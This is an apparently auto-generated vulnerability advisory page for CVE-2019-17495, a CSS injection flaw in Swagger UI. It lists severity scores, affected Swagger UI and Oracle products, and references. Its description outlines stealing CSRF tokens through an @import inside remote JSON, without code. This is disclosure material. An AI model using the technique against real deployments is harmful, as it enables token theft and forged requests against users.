Free and open-source vulnerability scanner
Mageni eases for you the vulnerability scanning, assessment, and management process. It is free and open-source.
Install NowAvailable for macOS, Windows, and Linux
CVE-2019-17495
CVE information
Published
Last Modified
CVSSv2.0 Severity
CVSSv3.1 Severity
Impact Analysis
Description
A Cascading Style Sheets (CSS) injection vulnerability in Swagger UI before 3.23.11 allows attackers to use the Relative Path Overwrite (RPO) technique to perform CSS-based input field value exfiltration, such as exfiltration of a CSRF token value. In other words, this product intentionally allows the embedding of untrusted JSON data from remote servers, but it was not previously known that <style>@import within the JSON data was a functional attack method..
CVSSv2.0 Score
- Severity
- High
- Base Score
- 7.5/10
- Exploit Score
- 10/10
- Access Vector
- Network
- Access Complexity
- Low
- Authentication Required
- None
- Impact Score
- 6.4/10
- Confidentiality Impact
- Partial
- Availability Impact
- Partial
- Integrity Impact
- Partial
CVSSv3.1 Score
- Severity
- Critical
- Base Score
- 9.8/10
- Exploit Score
- 3.9/10
- Access Vector
- Network
- Access Complexity
- Low
- Privileges Required
- None
- Impact Score
- 5.9/10
- Confidentiality Impact
- High
- Availability Impact
- High
- Integrity Impact
- High
- Scope
- Unchanged
- User Interaction
- None
Products Affected
CPE | Affected | Vulnerable | Excluding | Edit |
---|---|---|---|---|
cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:* |
Yes
|
- | 3.23.11 | |
cpe:2.3:a:oracle:utilities_framework:4.3.0.6.0:*:*:*:*:*:*:* |
Yes
|
- | - | |
cpe:2.3:a:oracle:utilities_framework:4.4.0.0.0:*:*:*:*:*:*:* |
Yes
|
- | - | |
cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:* |
Yes
|
- | - | |
cpe:2.3:a:oracle:utilities_framework:4.4.0.2.0:*:*:*:*:*:*:* |
Yes
|
- | - | |
cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:* |
Yes
|
- | - | |
cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:* |
Yes
|
- | - | |
cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* |
Yes
|
16.2.0 | - | |
cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:* |
Yes
|
2.4.0 | - | |
cpe:2.3:a:oracle:banking_digital_experience:21.1:*:*:*:*:*:* |
Yes
|
- | - | |
cpe:2.3:a:oracle:banking_apis:*:*:*:*:*:*:*:* |
Yes
|
18.1 | - | |
cpe:2.3:a:oracle:banking_apis:19.1:*:*:*:*:*:*:* |
Yes
|
- | - | |
cpe:2.3:a:oracle:banking_apis:19.2:*:*:*:*:*:*:* |
Yes
|
- | - | |
cpe:2.3:a:oracle:banking_apis:20.1:*:*:*:*:*:*:* |
Yes
|
- | - | |
cpe:2.3:a:oracle:banking_apis:21.1:*:*:*:*:*:*:* |
Yes
|
- | - | |
cpe:2.3:a:oracle:banking_digital_experience:*:*:*:*:*:*:*:* |
Yes
|
18.1 | - | |
cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* |
Yes
|
17.12.0 | - |
References
- https://github.com/tarantula-team/CSS-injection-in-Swagger-UI
- https://github.com/swagger-api/swagger-ui/releases/tag/v3.23.11
- https://www.oracle.com/security-alerts/cpuoct2020.html
- https://www.oracle.com/security-alerts/cpuApr2021.html
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://lists.apache.org/thread.html/r3acb7e494cf1aab99b6784b7c5bbddfd0d4f8a484ab534c3a6
- https://lists.apache.org/thread.html/r103579b01da2d0aa0f672b88f811224bbf8ef493aaad845895
- https://lists.apache.org/thread.html/ref70b940c4f69560d29d6ba792d6c82865e74de3dcad4c92d9
- https://lists.apache.org/thread.html/r853ffeb915a400f899de78124d4e0d77a19379d2e11bf8f4e9
- https://lists.apache.org/thread.html/r84b327f7a8b6b28857b906c07a66dd98e1d341191fa8d78165